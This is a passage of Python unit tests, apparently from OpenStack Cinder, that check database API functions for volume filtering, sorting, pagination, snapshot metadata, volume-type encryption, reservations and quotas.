def test_volume_get_all_by_host_with_pools(self):
volumes = []
vol_on_host_wo_pool = [db.volume_create(self.ctxt, {'host': 'foo'})
for j in xrange(3)]
vol_on_host_w_pool = [db.volume_create(
self.ctxt, {'host': 'foo#pool0'})]
volumes.append((vol_on_host_wo_pool +
vol_on_host_w_pool))
# insert an additional record that doesn't belongs to the same
# host as 'foo' and test if it is included in the result
db.volume_create(self.ctxt, {'host': 'foobar'})
self._assertEqualListsOfObjects(volumes[0],
db.volume_get_all_by_host(
self.ctxt, 'foo'))
def test_volume_get_all_by_host_with_filters(self):
v1 = db.volume_create(self.ctxt, {'host': 'h1', 'display_name': 'v1',
'status': 'available'})
v2 = db.volume_create(self.ctxt, {'host': 'h1', 'display_name': 'v2',
'status': 'available'})
v3 = db.volume_create(self.ctxt, {'host': 'h2', 'display_name': 'v1',
'status': 'available'})
self._assertEqualListsOfObjects(
[v1],
db.volume_get_all_by_host(self.ctxt, 'h1',
filters={'display_name': 'v1'}))
self._assertEqualListsOfObjects(
[v1, v2],
db.volume_get_all_by_host(
self.ctxt, 'h1',
filters={'display_name': ['v1', 'v2', 'foo']}))
self._assertEqualListsOfObjects(
[v1, v2],
db.volume_get_all_by_host(self.ctxt, 'h1',
filters={'status': 'available'}))
self._assertEqualListsOfObjects(
[v3],
db.volume_get_all_by_host(self.ctxt, 'h2',
filters={'display_name': 'v1'}))
# No match
vols = db.volume_get_all_by_host(self.ctxt, 'h1',
filters={'status': 'foo'})
self.assertEqual([], vols)
# Bogus filter, should return empty list
vols = db.volume_get_all_by_host(self.ctxt, 'h1',
filters={'foo': 'bar'})
self.assertEqual([], vols)
def test_volume_get_all_by_group(self):
volumes = []
for i in xrange(3):
volumes.append([db.volume_create(self.ctxt, {
'consistencygroup_id': 'g%d' % i}) for j in xrange(3)])
for i in xrange(3):
self._assertEqualListsOfObjects(volumes[i],
db.volume_get_all_by_group(
self.ctxt, 'g%d' % i))
def test_volume_get_all_by_group_with_filters(self):
v1 = db.volume_create(self.ctxt, {'consistencygroup_id': 'g1',
'display_name': 'v1'})
v2 = db.volume_create(self.ctxt, {'consistencygroup_id': 'g1',
'display_name': 'v2'})
v3 = db.volume_create(self.ctxt, {'consistencygroup_id': 'g2',
'display_name': 'v1'})
self._assertEqualListsOfObjects(
[v1],
db.volume_get_all_by_group(self.ctxt, 'g1',
filters={'display_name': 'v1'}))
self._assertEqualListsOfObjects(
[v1, v2],
db.volume_get_all_by_group(self.ctxt, 'g1',
filters={'display_name': ['v1', 'v2']}))
self._assertEqualListsOfObjects(
[v3],
db.volume_get_all_by_group(self.ctxt, 'g2',
filters={'display_name': 'v1'}))
# No match
vols = db.volume_get_all_by_group(self.ctxt, 'g1',
filters={'display_name': 'foo'})
self.assertEqual([], vols)
# Bogus filter, should return empty list
vols = db.volume_get_all_by_group(self.ctxt, 'g1',
filters={'foo': 'bar'})
self.assertEqual([], vols)
def test_volume_get_all_by_project(self):
volumes = []
for i in xrange(3):
volumes.append([db.volume_create(self.ctxt, {
'project_id': 'p%d' % i}) for j in xrange(3)])
for i in xrange(3):
self._assertEqualListsOfObjects(volumes[i],
db.volume_get_all_by_project(
self.ctxt, 'p%d' % i, None,
None, ['host'], None))
def test_volume_get_by_name(self):
db.volume_create(self.ctxt, {'display_name': 'vol1'})
db.volume_create(self.ctxt, {'display_name': 'vol2'})
db.volume_create(self.ctxt, {'display_name': 'vol3'})
# no name filter
volumes = db.volume_get_all(self.ctxt, None, None, ['created_at'],
['asc'])
self.assertEqual(len(volumes), 3)
# filter on name
volumes = db.volume_get_all(self.ctxt, None, None, ['created_at'],
['asc'], {'display_name': 'vol2'})
self.assertEqual(len(volumes), 1)
self.assertEqual(volumes[0]['display_name'], 'vol2')
# filter no match
volumes = db.volume_get_all(self.ctxt, None, None, ['created_at'],
['asc'], {'display_name': 'vol4'})
self.assertEqual(len(volumes), 0)
def test_volume_list_by_status(self):
db.volume_create(self.ctxt, {'display_name': 'vol1',
'status': 'available'})
db.volume_create(self.ctxt, {'display_name': 'vol2',
'status': 'available'})
db.volume_create(self.ctxt, {'display_name': 'vol3',
'status': 'in-use'})
# no status filter
volumes = db.volume_get_all(self.ctxt, None, None, ['created_at'],
['asc'])
self.assertEqual(len(volumes), 3)
# single match
volumes = db.volume_get_all(self.ctxt, None, None, ['created_at'],
['asc'], {'status': 'in-use'})
self.assertEqual(len(volumes), 1)
self.assertEqual(volumes[0]['status'], 'in-use')
# multiple match
volumes = db.volume_get_all(self.ctxt, None, None, ['created_at'],
['asc'], {'status': 'available'})
self.assertEqual(len(volumes), 2)
for volume in volumes:
self.assertEqual(volume['status'], 'available')
# multiple filters
volumes = db.volume_get_all(self.ctxt, None, None, ['created_at'],
['asc'], {'status': 'available',
'display_name': 'vol1'})
self.assertEqual(len(volumes), 1)
self.assertEqual(volumes[0]['display_name'], 'vol1')
self.assertEqual(volumes[0]['status'], 'available')
# no match
volumes = db.volume_get_all(self.ctxt, None, None, ['created_at'],
['asc'], {'status': 'in-use',
'display_name': 'vol1'})
self.assertEqual(len(volumes), 0)
def _assertEqualsVolumeOrderResult(self, correct_order, limit=None,
sort_keys=None, sort_dirs=None,
filters=None, project_id=None,
marker=None,
match_keys=['id', 'display_name',
'volume_metadata',
'created_at']):
""""Verifies that volumes are returned in the correct order."""
if project_id:
result = db.volume_get_all_by_project(self.ctxt, project_id,
marker, limit,
sort_keys=sort_keys,
sort_dirs=sort_dirs,
filters=filters)
else:
result = db.volume_get_all(self.ctxt, marker, limit,
sort_keys=sort_keys,
sort_dirs=sort_dirs,
filters=filters)
self.assertEqual(len(correct_order), len(result))
for vol1, vol2 in zip(result, correct_order):
for key in match_keys:
val1 = vol1.get(key)
val2 = vol2.get(key)
# metadata is a dict, compare the 'key' and 'value' of each
if key == 'volume_metadata':
self.assertEqual(len(val1), len(val2))
val1_dict = dict((x.key, x.value) for x in val1)
val2_dict = dict((x.key, x.value) for x in val2)
self.assertDictMatch(val1_dict, val2_dict)
else:
self.assertEqual(val1, val2)
return result
def test_volume_get_by_filter(self):
"""Verifies that all filtering is done at the DB layer."""
vols = []
vols.extend([db.volume_create(self.ctxt,
{'project_id': 'g1',
'display_name': 'name_%d' % i,
'size': 1})
for i in xrange(2)])
vols.extend([db.volume_create(self.ctxt,
{'project_id': 'g1',
'display_name': 'name_%d' % i,
'size': 2})
for i in xrange(2)])
vols.extend([db.volume_create(self.ctxt,
{'project_id': 'g1',
'display_name': 'name_%d' % i})
for i in xrange(2)])
vols.extend([db.volume_create(self.ctxt,
{'project_id': 'g2',
'display_name': 'name_%d' % i,
'size': 1})
for i in xrange(2)])
# By project, filter on size and name
filters = {'size': '1'}
correct_order = [vols[1], vols[0]]
self._assertEqualsVolumeOrderResult(correct_order, filters=filters,
project_id='g1')
filters = {'size': '1', 'display_name': 'name_1'}
correct_order = [vols[1]]
self._assertEqualsVolumeOrderResult(correct_order, filters=filters,
project_id='g1')
# Remove project scope
filters = {'size': '1'}
correct_order = [vols[7], vols[6], vols[1], vols[0]]
self._assertEqualsVolumeOrderResult(correct_order, filters=filters)
filters = {'size': '1', 'display_name': 'name_1'}
correct_order = [vols[7], vols[1]]
self._assertEqualsVolumeOrderResult(correct_order, filters=filters)
# Remove size constraint
filters = {'display_name': 'name_1'}
correct_order = [vols[5], vols[3], vols[1]]
self._assertEqualsVolumeOrderResult(correct_order, filters=filters,
project_id='g1')
correct_order = [vols[7], vols[5], vols[3], vols[1]]
self._assertEqualsVolumeOrderResult(correct_order, filters=filters)
# Verify bogus values return nothing
filters = {'display_name': 'name_1', 'bogus_value': 'foo'}
self._assertEqualsVolumeOrderResult([], filters=filters,
project_id='g1')
self._assertEqualsVolumeOrderResult([], project_id='bogus')
self._assertEqualsVolumeOrderResult([], filters=filters)
self._assertEqualsVolumeOrderResult([], filters={'metadata':
'not valid'})
self._assertEqualsVolumeOrderResult([], filters={'metadata':
['not', 'valid']})
# Verify that relationship property keys return nothing, these
# exist on the Volumes model but are not columns
filters = {'volume_type': 'bogus_type'}
self._assertEqualsVolumeOrderResult([], filters=filters)
def test_volume_get_all_filters_limit(self):
vol1 = db.volume_create(self.ctxt, {'display_name': 'test1'})
vol2 = db.volume_create(self.ctxt, {'display_name': 'test2'})
vol3 = db.volume_create(self.ctxt, {'display_name': 'test2',
'metadata': {'key1': 'val1'}})
vol4 = db.volume_create(self.ctxt, {'display_name': 'test3',
'metadata': {'key1': 'val1',
'key2': 'val2'}})
vol5 = db.volume_create(self.ctxt, {'display_name': 'test3',
'metadata': {'key2': 'val2',
'key3': 'val3'},
'host': 'host5'})
db.volume_admin_metadata_update(self.ctxt, vol5.id,
{"readonly": "True"}, False)
vols = [vol5, vol4, vol3, vol2, vol1]
# Ensure we have 5 total instances
self._assertEqualsVolumeOrderResult(vols)
# No filters, test limit
self._assertEqualsVolumeOrderResult(vols[:1], limit=1)
self._assertEqualsVolumeOrderResult(vols[:4], limit=4)
# Just the test2 volumes
filters = {'display_name': 'test2'}
self._assertEqualsVolumeOrderResult([vol3, vol2], filters=filters)
self._assertEqualsVolumeOrderResult([vol3], limit=1,
filters=filters)
self._assertEqualsVolumeOrderResult([vol3, vol2], limit=2,
filters=filters)
self._assertEqualsVolumeOrderResult([vol3, vol2], limit=100,
filters=filters)
# metadata filters
filters = {'metadata': {'key1': 'val1'}}
self._assertEqualsVolumeOrderResult([vol4, vol3], filters=filters)
self._assertEqualsVolumeOrderResult([vol4], limit=1,
filters=filters)
self._assertEqualsVolumeOrderResult([vol4, vol3], limit=10,
filters=filters)
filters = {'metadata': {'readonly': 'True'}}
self._assertEqualsVolumeOrderResult([vol5], filters=filters)
filters = {'metadata': {'key1': 'val1',
'key2': 'val2'}}
self._assertEqualsVolumeOrderResult([vol4], filters=filters)
self._assertEqualsVolumeOrderResult([vol4], limit=1,
filters=filters)
# No match
filters = {'metadata': {'key1': 'val1',
'key2': 'val2',
'key3': 'val3'}}
self._assertEqualsVolumeOrderResult([], filters=filters)
filters = {'metadata': {'key1': 'val1',
'key2': 'bogus'}}
self._assertEqualsVolumeOrderResult([], filters=filters)
filters = {'metadata': {'key1': 'val1',
'key2': 'val1'}}
self._assertEqualsVolumeOrderResult([], filters=filters)
# Combination
filters = {'display_name': 'test2',
'metadata': {'key1': 'val1'}}
self._assertEqualsVolumeOrderResult([vol3], filters=filters)
self._assertEqualsVolumeOrderResult([vol3], limit=1,
filters=filters)
self._assertEqualsVolumeOrderResult([vol3], limit=100,
filters=filters)
filters = {'display_name': 'test3',
'metadata': {'key2': 'val2',
'key3': 'val3'},
'host': 'host5'}
self._assertEqualsVolumeOrderResult([vol5], filters=filters)
self._assertEqualsVolumeOrderResult([vol5], limit=1,
filters=filters)
def test_volume_get_no_migration_targets(self):
"""Verifies the unique 'no_migration_targets'=True filter.
This filter returns volumes with either a NULL 'migration_status'
or a non-NULL value that does not start with 'target:'.
"""
vol1 = db.volume_create(self.ctxt, {'display_name': 'test1'})
vol2 = db.volume_create(self.ctxt, {'display_name': 'test2',
'migration_status': 'bogus'})
vol3 = db.volume_create(self.ctxt, {'display_name': 'test3',
'migration_status': 'btarget:'})
vol4 = db.volume_create(self.ctxt, {'display_name': 'test4',
'migration_status': 'target:'})
# Ensure we have 4 total instances, default sort of created_at (desc)
self._assertEqualsVolumeOrderResult([vol4, vol3, vol2, vol1])
# Apply the unique filter
filters = {'no_migration_targets': True}
self._assertEqualsVolumeOrderResult([vol3, vol2, vol1],
filters=filters)
self._assertEqualsVolumeOrderResult([vol3, vol2], limit=2,
filters=filters)
filters = {'no_migration_targets': True,
'display_name': 'test4'}
self._assertEqualsVolumeOrderResult([], filters=filters)
def test_volume_get_all_by_filters_sort_keys(self):
# Volumes that will reply to the query
test_h1_avail = db.volume_create(self.ctxt, {'display_name': 'test',
'status': 'available',
'host': 'h1'})
test_h1_error = db.volume_create(self.ctxt, {'display_name': 'test',
'status': 'error',
'host': 'h1'})
test_h1_error2 = db.volume_create(self.ctxt, {'display_name': 'test',
'status': 'error',
'host': 'h1'})
test_h2_avail = db.volume_create(self.ctxt, {'display_name': 'test',
'status': 'available',
'host': 'h2'})
test_h2_error = db.volume_create(self.ctxt, {'display_name': 'test',
'status': 'error',
'host': 'h2'})
test_h2_error2 = db.volume_create(self.ctxt, {'display_name': 'test',
'status': 'error',
'host': 'h2'})
# Other volumes in the DB, will not match name filter
other_error = db.volume_create(self.ctxt, {'display_name': 'other',
'status': 'error',
'host': 'a'})
other_active = db.volume_create(self.ctxt, {'display_name': 'other',
'status': 'available',
'host': 'a'})
filters = {'display_name': 'test'}
# Verify different sort key/direction combinations
sort_keys = ['host', 'status', 'created_at']
sort_dirs = ['asc', 'asc', 'asc']
correct_order = [test_h1_avail, test_h1_error, test_h1_error2,
test_h2_avail, test_h2_error, test_h2_error2]
self._assertEqualsVolumeOrderResult(correct_order, filters=filters,
sort_keys=sort_keys,
sort_dirs=sort_dirs)
sort_dirs = ['asc', 'desc', 'asc']
correct_order = [test_h1_error, test_h1_error2, test_h1_avail,
test_h2_error, test_h2_error2, test_h2_avail]
self._assertEqualsVolumeOrderResult(correct_order, filters=filters,
sort_keys=sort_keys,
sort_dirs=sort_dirs)
sort_dirs = ['desc', 'desc', 'asc']
correct_order = [test_h2_error, test_h2_error2, test_h2_avail,
test_h1_error, test_h1_error2, test_h1_avail]
self._assertEqualsVolumeOrderResult(correct_order, filters=filters,
sort_keys=sort_keys,
sort_dirs=sort_dirs)
# created_at is added by default if not supplied, descending order
sort_keys = ['host', 'status']
sort_dirs = ['desc', 'desc']
correct_order = [test_h2_error2, test_h2_error, test_h2_avail,
test_h1_error2, test_h1_error, test_h1_avail]
self._assertEqualsVolumeOrderResult(correct_order, filters=filters,
sort_keys=sort_keys,
sort_dirs=sort_dirs)
sort_dirs = ['asc', 'asc']
correct_order = [test_h1_avail, test_h1_error, test_h1_error2,
test_h2_avail, test_h2_error, test_h2_error2]
self._assertEqualsVolumeOrderResult(correct_order, filters=filters,
sort_keys=sort_keys,
sort_dirs=sort_dirs)
# Remove name filter
correct_order = [other_active, other_error,
test_h1_avail, test_h1_error, test_h1_error2,
test_h2_avail, test_h2_error, test_h2_error2]
self._assertEqualsVolumeOrderResult(correct_order, sort_keys=sort_keys,
sort_dirs=sort_dirs)
# No sort data, default sort of created_at, id (desc)
correct_order = [other_active, other_error,
test_h2_error2, test_h2_error, test_h2_avail,
test_h1_error2, test_h1_error, test_h1_avail]
self._assertEqualsVolumeOrderResult(correct_order)
def test_volume_get_all_by_filters_sort_keys_paginate(self):
'''Verifies sort order with pagination.'''
# Volumes that will reply to the query
test1_avail = db.volume_create(self.ctxt, {'display_name': 'test',
'size': 1,
'status': 'available'})
test1_error = db.volume_create(self.ctxt, {'display_name': 'test',
'size': 1,
'status': 'error'})
test1_error2 = db.volume_create(self.ctxt, {'display_name': 'test',
'size': 1,
'status': 'error'})
test2_avail = db.volume_create(self.ctxt, {'display_name': 'test',
'size': 2,
'status': 'available'})
test2_error = db.volume_create(self.ctxt, {'display_name': 'test',
'size': 2,
'status': 'error'})
test2_error2 = db.volume_create(self.ctxt, {'display_name': 'test',
'size': 2,
'status': 'error'})
# Other volumes in the DB, will not match name filter
db.volume_create(self.ctxt, {'display_name': 'other'})
db.volume_create(self.ctxt, {'display_name': 'other'})
filters = {'display_name': 'test'}
# Common sort information for every query
sort_keys = ['size', 'status', 'created_at']
sort_dirs = ['asc', 'desc', 'asc']
# Overall correct volume order based on the sort keys
correct_order = [test1_error, test1_error2, test1_avail,
test2_error, test2_error2, test2_avail]
# Limits of 1, 2, and 3, verify that the volumes returned are in the
# correct sorted order, update the marker to get the next correct page
for limit in range(1, 4):
marker = None
# Include the maximum number of volumes (ie, 6) to ensure that
# the last query (with marker pointing to the last volume)
# returns 0 servers
for i in range(0, 7, limit):
if i == len(correct_order):
correct = []
else:
correct = correct_order[i:i + limit]
vols = self._assertEqualsVolumeOrderResult(
correct, filters=filters,
sort_keys=sort_keys, sort_dirs=sort_dirs,
limit=limit, marker=marker)
if correct:
marker = vols[-1]['id']
self.assertEqual(correct[-1]['id'], marker)
def test_volume_get_all_invalid_sort_key(self):
for keys in (['foo'], ['display_name', 'foo']):
self.assertRaises(exception.InvalidInput, db.volume_get_all,
self.ctxt, None, None, sort_keys=keys)
def test_volume_get_iscsi_target_num(self):
db.iscsi_target_create_safe(self.ctxt, {'volume_id': 42,
'target_num': 43})
self.assertEqual(43, db.volume_get_iscsi_target_num(self.ctxt, 42))
def test_volume_get_iscsi_target_num_nonexistent(self):
self.assertRaises(exception.ISCSITargetNotFoundForVolume,
db.volume_get_iscsi_target_num, self.ctxt, 42)
def test_volume_update(self):
volume = db.volume_create(self.ctxt, {'host': 'h1'})
ref_a = db.volume_update(self.ctxt, volume['id'],
{'host': 'h2',
'metadata': {'m1': 'v1'}})
volume = db.volume_get(self.ctxt, volume['id'])
self.assertEqual('h2', volume['host'])
self.assertEqual(dict(ref_a), dict(volume))
def test_volume_update_nonexistent(self):
self.assertRaises(exception.VolumeNotFound, db.volume_update,
self.ctxt, 42, {})
def test_volume_metadata_get(self):
metadata = {'a': 'b', 'c': 'd'}
db.volume_create(self.ctxt, {'id': 1, 'metadata': metadata})
self.assertEqual(metadata, db.volume_metadata_get(self.ctxt, 1))
def test_volume_metadata_update(self):
metadata1 = {'a': '1', 'c': '2'}
metadata2 = {'a': '3', 'd': '5'}
should_be = {'a': '3', 'c': '2', 'd': '5'}
db.volume_create(self.ctxt, {'id': 1, 'metadata': metadata1})
db_meta = db.volume_metadata_update(self.ctxt, 1, metadata2, False)
self.assertEqual(should_be, db_meta)
def test_volume_metadata_update_delete(self):
metadata1 = {'a': '1', 'c': '2'}
metadata2 = {'a': '3', 'd': '4'}
should_be = metadata2
db.volume_create(self.ctxt, {'id': 1, 'metadata': metadata1})
db_meta = db.volume_metadata_update(self.ctxt, 1, metadata2, True)
self.assertEqual(should_be, db_meta)
def test_volume_metadata_delete(self):
metadata = {'a': 'b', 'c': 'd'}
db.volume_create(self.ctxt, {'id': 1, 'metadata': metadata})
db.volume_metadata_delete(self.ctxt, 1, 'c')
metadata.pop('c')
self.assertEqual(metadata, db.volume_metadata_get(self.ctxt, 1))
def test_volume_glance_metadata_create(self):
volume = db.volume_create(self.ctxt, {'host': 'h1'})
db.volume_glance_metadata_create(self.ctxt, volume['id'],
'image_name',
u'\xe4\xbd\xa0\xe5\xa5\xbd')
glance_meta = db.volume_glance_metadata_get(self.ctxt, volume['id'])
for meta_entry in glance_meta:
if meta_entry.key == 'image_name':
image_name = meta_entry.value
self.assertEqual(u'\xe4\xbd\xa0\xe5\xa5\xbd', image_name)
class DBAPISnapshotTestCase(BaseTest):
"""Tests for cinder.db.api.snapshot_*."""
def test_snapshot_data_get_for_project(self):
actual = db.snapshot_data_get_for_project(self.ctxt, 'project1')
self.assertEqual(actual, (0, 0))
db.volume_create(self.ctxt, {'id': 1,
'project_id': 'project1',
'size': 42})
db.snapshot_create(self.ctxt, {'id': 1, 'volume_id': 1,
'project_id': 'project1',
'volume_size': 42})
actual = db.snapshot_data_get_for_project(self.ctxt, 'project1')
self.assertEqual(actual, (1, 42))
def test_snapshot_get_all(self):
db.volume_create(self.ctxt, {'id': 1})
snapshot = db.snapshot_create(self.ctxt, {'id': 1, 'volume_id': 1})
self._assertEqualListsOfObjects([snapshot],
db.snapshot_get_all(self.ctxt),
ignored_keys=['metadata', 'volume'])
def test_snapshot_get_by_host(self):
db.volume_create(self.ctxt, {'id': 1, 'host': 'host1'})
db.volume_create(self.ctxt, {'id': 2, 'host': 'host2'})
snapshot1 = db.snapshot_create(self.ctxt, {'id': 1, 'volume_id': 1})
snapshot2 = db.snapshot_create(self.ctxt, {'id': 2, 'volume_id': 2,
'status': 'error'})
self._assertEqualListsOfObjects([snapshot1],
db.snapshot_get_by_host(
self.ctxt,
'host1'),
ignored_keys='volume')
self._assertEqualListsOfObjects([snapshot2],
db.snapshot_get_by_host(
self.ctxt,
'host2'),
ignored_keys='volume')
self._assertEqualListsOfObjects([],
db.snapshot_get_by_host(
self.ctxt,
'host2', {'status': 'available'}),
ignored_keys='volume')
self._assertEqualListsOfObjects([snapshot2],
db.snapshot_get_by_host(
self.ctxt,
'host2', {'status': 'error'}),
ignored_keys='volume')
def test_snapshot_metadata_get(self):
metadata = {'a': 'b', 'c': 'd'}
db.volume_create(self.ctxt, {'id': 1})
db.snapshot_create(self.ctxt,
{'id': 1, 'volume_id': 1, 'metadata': metadata})
self.assertEqual(metadata, db.snapshot_metadata_get(self.ctxt, 1))
def test_snapshot_metadata_update(self):
metadata1 = {'a': '1', 'c': '2'}
metadata2 = {'a': '3', 'd': '5'}
should_be = {'a': '3', 'c': '2', 'd': '5'}
db.volume_create(self.ctxt, {'id': 1})
db.snapshot_create(self.ctxt,
{'id': 1, 'volume_id': 1, 'metadata': metadata1})
db_meta = db.snapshot_metadata_update(self.ctxt, 1, metadata2, False)
self.assertEqual(should_be, db_meta)
def test_snapshot_metadata_update_delete(self):
metadata1 = {'a': '1', 'c': '2'}
metadata2 = {'a': '3', 'd': '5'}
should_be = metadata2
db.volume_create(self.ctxt, {'id': 1})
db.snapshot_create(self.ctxt,
{'id': 1, 'volume_id': 1, 'metadata': metadata1})
db_meta = db.snapshot_metadata_update(self.ctxt, 1, metadata2, True)
self.assertEqual(should_be, db_meta)
def test_snapshot_metadata_delete(self):
metadata = {'a': '1', 'c': '2'}
should_be = {'a': '1'}
db.volume_create(self.ctxt, {'id': 1})
db.snapshot_create(self.ctxt,
{'id': 1, 'volume_id': 1, 'metadata': metadata})
db.snapshot_metadata_delete(self.ctxt, 1, 'c')
self.assertEqual(should_be, db.snapshot_metadata_get(self.ctxt, 1))
class DBAPIVolumeTypeTestCase(BaseTest):
"""Tests for the db.api.volume_type_* methods."""
def setUp(self):
self.ctxt = context.get_admin_context()
super(DBAPIVolumeTypeTestCase, self).setUp()
def test_volume_type_create_exists(self):
vt = db.volume_type_create(self.ctxt, {'name': 'n1'})
self.assertRaises(exception.VolumeTypeExists,
db.volume_type_create,
self.ctxt,
{'name': 'n1'})
self.assertRaises(exception.VolumeTypeExists,
db.volume_type_create,
self.ctxt,
{'name': 'n2', 'id': vt['id']})
def test_get_volume_type_extra_specs(self):
# Ensure that volume type extra specs can be accessed after
# the DB session is closed.
vt_extra_specs = {'mock_key': 'mock_value'}
vt = db.volume_type_create(self.ctxt,
{'name': 'n1',
'extra_specs': vt_extra_specs})
volume_ref = db.volume_create(self.ctxt, {'volume_type_id': vt.id})
session = sqlalchemy_api.get_session()
volume = sqlalchemy_api._volume_get(self.ctxt, volume_ref.id,
session=session)
session.close()
actual_specs = {}
for spec in volume.volume_type.extra_specs:
actual_specs[spec.key] = spec.value
self.assertEqual(vt_extra_specs, actual_specs)
class DBAPIEncryptionTestCase(BaseTest):
"""Tests for the db.api.volume_(type_)?encryption_* methods."""
_ignored_keys = [
'deleted',
'deleted_at',
'created_at',
'updated_at',
'encryption_id',
]
def setUp(self):
super(DBAPIEncryptionTestCase, self).setUp()
self.created = \
[db.volume_type_encryption_create(self.ctxt,
values['volume_type_id'], values)
for values in self._get_values()]
def _get_values(self, one=False, updated=False):
base_values = {
'cipher': 'fake_cipher',
'key_size': 256,
'provider': 'fake_provider',
'volume_type_id': 'fake_type',
'control_location': 'front-end',
}
updated_values = {
'cipher': 'fake_updated_cipher',
'key_size': 512,
'provider': 'fake_updated_provider',
'volume_type_id': 'fake_type',
'control_location': 'front-end',
}
if one:
return base_values
if updated:
values = updated_values
else:
values = base_values
def compose(val, step):
if isinstance(val, str):
step = str(step)
return val + step
return [dict([(k, compose(v, i)) for k, v in values.items()])
for i in range(1, 4)]
def test_volume_type_encryption_create(self):
values = self._get_values()
for i, encryption in enumerate(self.created):
self._assertEqualObjects(values[i], encryption, self._ignored_keys)
def test_volume_type_encryption_update(self):
update_values = self._get_values(updated=True)
self.updated = \
[db.volume_type_encryption_update(self.ctxt,
values['volume_type_id'], values)
for values in update_values]
for i, encryption in enumerate(self.updated):
self._assertEqualObjects(update_values[i], encryption,
self._ignored_keys)
def test_volume_type_encryption_get(self):
for encryption in self.created:
encryption_get = \
db.volume_type_encryption_get(self.ctxt,
encryption['volume_type_id'])
self._assertEqualObjects(encryption, encryption_get,
self._ignored_keys)
def test_volume_type_update_with_no_create(self):
self.assertRaises(exception.VolumeTypeEncryptionNotFound,
db.volume_type_encryption_update,
self.ctxt,
'fake_no_create_type',
{'cipher': 'fake_updated_cipher'})
def test_volume_type_encryption_delete(self):
values = {
'cipher': 'fake_cipher',
'key_size': 256,
'provider': 'fake_provider',
'volume_type_id': 'fake_type',
'control_location': 'front-end',
}
encryption = db.volume_type_encryption_create(self.ctxt, 'fake_type',
values)
self._assertEqualObjects(values, encryption, self._ignored_keys)
db.volume_type_encryption_delete(self.ctxt,
encryption['volume_type_id'])
encryption_get = \
db.volume_type_encryption_get(self.ctxt,
encryption['volume_type_id'])
self.assertIsNone(encryption_get)
def test_volume_encryption_get(self):
# normal volume -- metadata should be None
volume = db.volume_create(self.ctxt, {})
values = db.volume_encryption_metadata_get(self.ctxt, volume.id)
self.assertEqual({'encryption_key_id': None}, values)
# encrypted volume -- metadata should match volume type
volume_type = self.created[0]
volume = db.volume_create(self.ctxt, {'volume_type_id':
volume_type['volume_type_id']})
values = db.volume_encryption_metadata_get(self.ctxt, volume.id)
expected = {
'encryption_key_id': volume.encryption_key_id,
'control_location': volume_type['control_location'],
'cipher': volume_type['cipher'],
'key_size': volume_type['key_size'],
'provider': volume_type['provider'],
}
self.assertEqual(expected, values)
class DBAPIReservationTestCase(BaseTest):
"""Tests for db.api.reservation_* methods."""
def setUp(self):
super(DBAPIReservationTestCase, self).setUp()
self.values = {
'uuid': 'sample-uuid',
'project_id': 'project1',
'resource': 'resource',
'delta': 42,
'expire': (datetime.datetime.utcnow() +
datetime.timedelta(days=1)),
'usage': {'id': 1}
}
def test_reservation_commit(self):
reservations = _quota_reserve(self.ctxt, 'project1')
expected = {'project_id': 'project1',
'volumes': {'reserved': 1, 'in_use': 0},
'gigabytes': {'reserved': 2, 'in_use': 0},
}
self.assertEqual(expected,
db.quota_usage_get_all_by_project(
self.ctxt, 'project1'))
db.reservation_commit(self.ctxt, reservations, 'project1')
expected = {'project_id': 'project1',
'volumes': {'reserved': 0, 'in_use': 1},
'gigabytes': {'reserved': 0, 'in_use': 2},
}
self.assertEqual(expected,
db.quota_usage_get_all_by_project(
self.ctxt,
'project1'))
def test_reservation_rollback(self):
reservations = _quota_reserve(self.ctxt, 'project1')
expected = {'project_id': 'project1',
'volumes': {'reserved': 1, 'in_use': 0},
'gigabytes': {'reserved': 2, 'in_use': 0},
}
self.assertEqual(expected,
db.quota_usage_get_all_by_project(
self.ctxt,
'project1'))
db.reservation_rollback(self.ctxt, reservations, 'project1')
expected = {'project_id': 'project1',
'volumes': {'reserved': 0, 'in_use': 0},
'gigabytes': {'reserved': 0, 'in_use': 0},
}
self.assertEqual(expected,
db.quota_usage_get_all_by_project(
self.ctxt,
'project1'))
def test_reservation_expire(self):
self.values['expire'] = datetime.datetime.utcnow() + \
datetime.timedelta(days=1)
_quota_reserve(self.ctxt, 'project1')
db.reservation_expire(self.ctxt)
expected = {'project_id': 'project1',
'gigabytes': {'reserved': 0, 'in_use': 0},
'volumes': {'reserved': 0, 'in_use': 0}}
self.assertEqual(expected,
db.quota_usage_get_all_by_project(
self.ctxt,
'project1'))
class DBAPIQuotaClassTestCase(BaseTest):
"""Tests for db.api.quota_class_* methods."""
def setUp(self):
super(DBAPIQuotaClassTestCase, self).setUp()
self.sample_qc = db.quota_class_create(self.ctxt, 'test_qc',
'test_resource', 42)
def test_quota_class_get(self):
qc = db.quota_class_get(self.ctxt, 'test_qc', 'test_resource')
self._assertEqualObjects(self.sample_qc, qc)
def test_quota_class_destroy(self):
db.quota_class_destroy(self.ctxt, 'test_qc', 'test_resource')
self.assertRaises(exception.QuotaClassNotFound,
db.quota_class_get, self.ctxt,
'test_qc', 'test_resource')
def test_quota_class_get_not_found(self):
self.assertRaises(exception.QuotaClassNotFound,
db.quota_class_get, self.ctxt, 'nonexistent',
'nonexistent')
def test_quota_class_get_all_by_name(self):
db.quota_class_create(self.ctxt, 'test2', 'res1', 43)
db.quota_class_create(self.ctxt, 'test2', 'res2', 44)
self.assertEqual({'class_name': 'test_qc', 'test_resource': 42},
db.quota_class_get_all_by_name(self.ctxt, 'test_qc'))
self.assertEqual({'class_name': 'test2', 'res1': 43, 'res2': 44},
db.quota_class_get_all_by_name(self.ctxt, 'test2'))
def test_quota_class_update(self):
db.quota_class_update(self.ctxt, 'test_qc', 'test_resource', 43)
updated = db.quota_class_get(self.ctxt, 'test_qc', 'test_resource')
self.assertEqual(43, updated['hard_limit'])
def test_quota_class_destroy_all_by_name(self):
db.quota_class_create(self.ctxt, 'test2', 'res1', 43)
db.quota_class_create(self.ctxt, 'test2', 'res2', 44)
db.quota_class_destroy_all_by_name(self.ctxt, 'test2')
self.assertEqual({'class_name': 'test2'},
db.quota_class_get_all_by_name(self.ctxt, 'test2'))
class DBAPIQuotaTestCase(BaseTest):
"""Tests for db.api.reservation_* methods."""
def test_quota_create(self):
quota = db.quota_create(self.ctxt, 'project1', 'resource', 99)
self.assertEqual(quota.resource, 'resource')
self.assertEqual(quota.hard_limit, 99)
self.assertEqual(quota.project_id, 'project1')
def test_quota_get(self):
quota = db.quota_create(self.ctxt, 'project1', 'resource', 99)
quota_db = db.quota_get(self.ctxt, 'project1', 'resource')
self._assertEqualObjects(quota, quota_db)
def test_quota_get_all_by_project(self):
for i in range(3):
for j in range(3):
db.quota_create(self.ctxt, 'proj%d' % i, 'res%d' % j, j)
